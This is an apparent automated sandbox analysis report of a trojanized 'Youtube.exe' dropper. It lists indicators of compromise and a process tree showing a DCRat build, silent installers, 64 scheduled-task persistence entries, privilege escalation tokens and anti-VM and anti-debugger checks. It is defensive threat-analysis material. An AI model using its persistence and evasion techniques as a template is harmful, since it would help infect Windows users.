description ioc Process Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings solara.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings Frage build.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings ComContainerbrowserRefRuntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings DCRatBuild.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" msiexec.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 312816.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe:Zone.Identifier msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4028 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3140 schtasks.exe 232 schtasks.exe 3232 schtasks.exe 1932 schtasks.exe 1952 schtasks.exe 1316 schtasks.exe 236 schtasks.exe 2736 schtasks.exe 4736 schtasks.exe 2128 schtasks.exe 2080 schtasks.exe 3240 schtasks.exe 3372 schtasks.exe 4388 schtasks.exe 1980 schtasks.exe 1380 schtasks.exe 1876 schtasks.exe 1760 schtasks.exe 4464 schtasks.exe 5028 schtasks.exe 3084 schtasks.exe 2848 schtasks.exe 424 schtasks.exe 4592 schtasks.exe 2908 schtasks.exe 3936 schtasks.exe 1992 schtasks.exe 3012 schtasks.exe 1292 schtasks.exe 5932 schtasks.exe 232 schtasks.exe 1148 schtasks.exe 2440 schtasks.exe 4388 schtasks.exe 4800 schtasks.exe 4064 schtasks.exe 4956 schtasks.exe 700 schtasks.exe 2488 schtasks.exe 4372 schtasks.exe 3124 schtasks.exe 1456 schtasks.exe 4764 schtasks.exe 4776 schtasks.exe 4328 schtasks.exe 5380 schtasks.exe 2284 schtasks.exe 3808 schtasks.exe 4696 schtasks.exe 4964 schtasks.exe 1896 schtasks.exe 2436 schtasks.exe 4880 schtasks.exe 5156 schtasks.exe 808 schtasks.exe 3792 schtasks.exe 4460 schtasks.exe 1284 schtasks.exe 784 schtasks.exe 392 schtasks.exe 1692 schtasks.exe 3636 schtasks.exe 2236 schtasks.exe 4548 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3976 SolaraBootstrapper.exe 3976 SolaraBootstrapper.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2188 Refcrt.exe 2068 powershell.exe 420 powershell.exe 2068 powershell.exe 420 powershell.exe 336 powershell.exe 336 powershell.exe 2892 powershell.exe 2892 powershell.exe 2352 powershell.exe 2352 powershell.exe 420 powershell.exe 2068 powershell.exe 2352 powershell.exe 2892 powershell.exe 336 powershell.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 1172 msiexec.exe 1172 msiexec.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 676 Refcrt.exe 420 powershell.exe 420 powershell.exe 2200 powershell.exe 2200 powershell.exe 3112 powershell.exe 3112 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5660 msedgewebview2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3976 SolaraBootstrapper.exe Token: SeDebugPrivilege 2188 Refcrt.exe Token: SeShutdownPrivilege 1360 msiexec.exe Token: SeIncreaseQuotaPrivilege 1360 msiexec.exe Token: SeSecurityPrivilege 1172 msiexec.exe Token: SeCreateTokenPrivilege 1360 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1360 msiexec.exe Token: SeLockMemoryPrivilege 1360 msiexec.exe Token: SeIncreaseQuotaPrivilege 1360 msiexec.exe Token: SeMachineAccountPrivilege 1360 msiexec.exe Token: SeTcbPrivilege 1360 msiexec.exe Token: SeSecurityPrivilege 1360 msiexec.exe Token: SeTakeOwnershipPrivilege 1360 msiexec.exe Token: SeLoadDriverPrivilege 1360 msiexec.exe Token: SeSystemProfilePrivilege 1360 msiexec.exe Token: SeSystemtimePrivilege 1360 msiexec.exe Token: SeProfSingleProcessPrivilege 1360 msiexec.exe Token: SeIncBasePriorityPrivilege 1360 msiexec.exe Token: SeCreatePagefilePrivilege 1360 msiexec.exe Token: SeCreatePermanentPrivilege 1360 msiexec.exe Token: SeBackupPrivilege 1360 msiexec.exe Token: SeRestorePrivilege 1360 msiexec.exe Token: SeShutdownPrivilege 1360 msiexec.exe Token: SeDebugPrivilege 1360 msiexec.exe Token: SeAuditPrivilege 1360 msiexec.exe Token: SeSystemEnvironmentPrivilege 1360 msiexec.exe Token: SeChangeNotifyPrivilege 1360 msiexec.exe Token: SeRemoteShutdownPrivilege 1360 msiexec.exe Token: SeUndockPrivilege 1360 msiexec.exe Token: SeSyncAgentPrivilege 1360 msiexec.exe Token: SeEnableDelegationPrivilege 1360 msiexec.exe Token: SeManageVolumePrivilege 1360 msiexec.exe Token: SeImpersonatePrivilege 1360 msiexec.exe Token: SeCreateGlobalPrivilege 1360 msiexec.exe Token: SeRestorePrivilege 1172 msiexec.exe Token: SeTakeOwnershipPrivilege 1172 msiexec.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 420 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 336 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeRestorePrivilege 1172 msiexec.exe Token: SeTakeOwnershipPrivilege 1172 msiexec.exe Token: SeDebugPrivilege 676 Refcrt.exe Token: SeRestorePrivilege 1172 msiexec.exe Token: SeTakeOwnershipPrivilege 1172 msiexec.exe Token: SeRestorePrivilege 1172 msiexec.exe Token: SeTakeOwnershipPrivilege 1172 msiexec.exe Token: SeRestorePrivilege 1172 msiexec.exe Token: SeTakeOwnershipPrivilege 1172 msiexec.exe Token: SeDebugPrivilege 420 powershell.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 4592 powershell.exe Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeDebugPrivilege 440 powershell.exe Token: SeDebugPrivilege 956 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe 5336 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4428 wrote to memory of 4944 4428 Youtube.exe 82 PID 4428 wrote to memory of 4944 4428 Youtube.exe 82 PID 4428 wrote to memory of 4944 4428 Youtube.exe 82 PID 4428 wrote to memory of 2344 4428 Youtube.exe 83 PID 4428 wrote to memory of 2344 4428 Youtube.exe 83 PID 4428 wrote to memory of 2344 4428 Youtube.exe 83 PID 4428 wrote to memory of 1444 4428 Youtube.exe 84 PID 4428 wrote to memory of 1444 4428 Youtube.exe 84 PID 4428 wrote to memory of 4904 4428 Youtube.exe 85 PID 4428 wrote to memory of 4904 4428 Youtube.exe 85 PID 4428 wrote to memory of 4904 4428 Youtube.exe 85 PID 4944 wrote to memory of 3976 4944 Result.exe 86 PID 4944 wrote to memory of 3976 4944 Result.exe 86 PID 4944 wrote to memory of 3976 4944 Result.exe 86 PID 2344 wrote to memory of 2720 2344 DCRatBuild.exe 88 PID 2344 wrote to memory of 2720 2344 DCRatBuild.exe 88 PID 2344 wrote to memory of 2720 2344 DCRatBuild.exe 88 PID 4944 wrote to memory of 4964 4944 Result.exe 89 PID 4944 wrote to memory of 4964 4944 Result.exe 89 PID 4944 wrote to memory of 4964 4944 Result.exe 89 PID 4904 wrote to memory of 5060 4904 Frage build.exe 90 PID 4904 wrote to memory of 5060 4904 Frage build.exe 90 PID 4904 wrote to memory of 5060 4904 Frage build.exe 90 PID 4964 wrote to memory of 1284 4964 solara.exe 91 PID 4964 wrote to memory of 1284 4964 solara.exe 91 PID 4964 wrote to memory of 1284 4964 solara.exe 91 PID 1284 wrote to memory of 772 1284 WScript.exe 92 PID 1284 wrote to memory of 772 1284 WScript.exe 92 PID 1284 wrote to memory of 772 1284 WScript.exe 92 PID 772 wrote to memory of 2188 772 cmd.exe 94 PID 772 wrote to memory of 2188 772 cmd.exe 94 PID 3976 wrote to memory of 1360 3976 SolaraBootstrapper.exe 95 PID 3976 wrote to memory of 1360 3976 SolaraBootstrapper.exe 95 PID 3976 wrote to memory of 1360 3976 SolaraBootstrapper.exe 95 PID 2188 wrote to memory of 2068 2188 Refcrt.exe 110 PID 2188 wrote to memory of 2068 2188 Refcrt.exe 110 PID 2188 wrote to memory of 420 2188 Refcrt.exe 111 PID 2188 wrote to memory of 420 2188 Refcrt.exe 111 PID 2188 wrote to memory of 336 2188 Refcrt.exe 112 PID 2188 wrote to memory of 336 2188 Refcrt.exe 112 PID 2188 wrote to memory of 2892 2188 Refcrt.exe 113 PID 2188 wrote to memory of 2892 2188 Refcrt.exe 113 PID 2188 wrote to memory of 2352 2188 Refcrt.exe 114 PID 2188 wrote to memory of 2352 2188 Refcrt.exe 114 PID 2188 wrote to memory of 676 2188 Refcrt.exe 122 PID 2188 wrote to memory of 676 2188 Refcrt.exe 122 PID 1172 wrote to memory of 3116 1172 msiexec.exe 123 PID 1172 wrote to memory of 3116 1172 msiexec.exe 123 PID 1172 wrote to memory of 4080 1172 msiexec.exe 124 PID 1172 wrote to memory of 4080 1172 msiexec.exe 124 PID 1172 wrote to memory of 4080 1172 msiexec.exe 124 PID 676 wrote to memory of 4972 676 Refcrt.exe 176 PID 676 wrote to memory of 4972 676 Refcrt.exe 176 PID 676 wrote to memory of 2188 676 Refcrt.exe 177 PID 676 wrote to memory of 2188 676 Refcrt.exe 177 PID 676 wrote to memory of 3112 676 Refcrt.exe 225 PID 676 wrote to memory of 3112 676 Refcrt.exe 225 PID 676 wrote to memory of 2200 676 Refcrt.exe 179 PID 676 wrote to memory of 2200 676 Refcrt.exe 179 PID 676 wrote to memory of 2276 676 Refcrt.exe 180 PID 676 wrote to memory of 2276 676 Refcrt.exe 180 PID 676 wrote to memory of 5004 676 Refcrt.exe 181 PID 676 wrote to memory of 5004 676 Refcrt.exe 181 PID 676 wrote to memory of 420 676 Refcrt.exe 182 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Youtube.exe"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3976 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart4⤵
- Executes dropped EXE
PID:5772 -
C:\Windows\Temp\{74FB1068-56AE-4C8B-BA11-D81D0EF69682}\.cr\vc_redist.x64.exe"C:\Windows\Temp\{74FB1068-56AE-4C8B-BA11-D81D0EF69682}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=580 -burn.filehandle.self=576 /install /quiet /norestart5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:976
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe4⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5336 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0xa0,0x7ffec26b3cb8,0x7ffec26b3cc8,0x7ffec26b3cd85⤵PID:6060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1880 /prefetch:25⤵PID:5976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:35⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:85⤵PID:2400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:15⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:15⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:15⤵PID:240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5656 /prefetch:85⤵PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:15⤵PID:3296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:15⤵PID:6004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:15⤵PID:1360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:15⤵PID:1884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:85⤵PID:4324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5764 /prefetch:85⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,13957115628739768525,4479574866502124957,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 /prefetch:85⤵
- NTFS ADS
PID:5216
-
-
C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe"C:\Users\Admin\Downloads\Bloxstrap-v2.5.4.exe"5⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5700 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=5700.4360.66656559335521351565⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5660 -
